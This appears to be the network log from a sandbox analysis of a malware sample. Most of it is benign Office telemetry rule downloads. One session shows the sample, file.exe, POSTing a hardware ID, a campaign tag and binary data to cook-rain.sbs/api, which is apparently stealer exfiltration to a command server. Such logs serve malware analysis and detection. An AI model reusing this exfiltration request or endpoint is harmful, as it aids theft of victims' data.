                                                                                                                                                                                                2024-11-20 09:54:25 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                48192.168.2.74975013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:25 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 491
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                x-ms-request-id: e456cfdf-c01e-0014-248c-3aa6a3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095425Z-185f5d8b95crwqd8hC1NYCps6800000009zg00000000dkew
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:25 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                49192.168.2.74975213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:25 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                x-ms-request-id: 5b8b83f7-201e-0033-0b8c-3ab167000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095425Z-r1d97b9957744xz5hC1TEB5bf800000008m00000000074rf
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:25 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                50192.168.2.74975413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:25 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                x-ms-request-id: 0514cbb3-901e-00ac-0281-3ab69e000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095425Z-185f5d8b95cdtclvhC1NYC4rmc0000000a4000000000f2yb
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                51192.168.2.74975313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:25 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 479
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                x-ms-request-id: a1cdeef9-f01e-0020-348c-3a956b000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095425Z-1777c6cb754gc8g6hC1TEB966c00000009d0000000009bwv
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:25 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                52192.168.2.74975513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:25 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                x-ms-request-id: 35891a85-601e-0070-700c-3ba0c9000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095425Z-1777c6cb754xjpthhC1TEBexs800000009c00000000016rm
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:25 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                53192.168.2.74975613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:25 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095425Z-185f5d8b95cqnkdjhC1NYCm8w800000009ug00000000f9s2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                54192.168.2.74975713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:25 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:25 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 477
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                x-ms-request-id: bdf96f18-c01e-0066-808c-3aa1ec000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095425Z-1777c6cb754n67brhC1TEBcp9c00000009f0000000009e76
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:25 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                55192.168.2.749758188.114.96.34437724C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:26 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=LEJX8O80FD1C9W
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Content-Length: 20383
                                                                                                                                                                                                Host: cook-rain.sbs
                                                                                                                                                                                                2024-11-20 09:54:26 UTC15331OUTData Raw: 2d 2d 4c 45 4a 58 38 4f 38 30 46 44 31 43 39 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 38 30 39 43 45 31 42 39 38 30 35 44 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 4c 45 4a 58 38 4f 38 30 46 44 31 43 39 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 45 4a 58 38 4f 38 30 46 44 31 43 39 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4c 45
                                                                                                                                                                                                Data Ascii: --LEJX8O80FD1C9WContent-Disposition: form-data; name="hwid"32809CE1B9805DCB63CFCF7E6C45F838--LEJX8O80FD1C9WContent-Disposition: form-data; name="pid"3--LEJX8O80FD1C9WContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--LE
                                                                                                                                                                                                2024-11-20 09:54:26 UTC5052OUTData Raw: 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00
                                                                                                                                                                                                Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                                                                                                2024-11-20 09:54:26 UTC984INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: PHPSESSID=1q7fmtn00698urnv9mlia3v55o; expires=Sun, 16-Mar-2025 03:41:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LVFxnIHQQO8W2rGhRCs%2FhIRCylrBTX3otN3298kAJxp%2F67ObX2HnyPbbj2Pcwy9czGoCAlosmSACpHHpN2oV566WLqrDwK5fC3rYH6mKewjeGCcPsE6CqeU%2FrxMv6zSA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8e578f015fdc0f3d-EWR
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1683&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2829&recv_bytes=21338&delivery_rate=1716637&cwnd=140&unsent_bytes=0&cid=16b547127206bf1b&ts=557&x=0"
                                                                                                                                                                                                2024-11-20 09:54:26 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                2024-11-20 09:54:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                56192.168.2.74975913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:26 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:26 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095426Z-r1d97b995777mdbwhC1TEBezag00000008q0000000006pyr
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
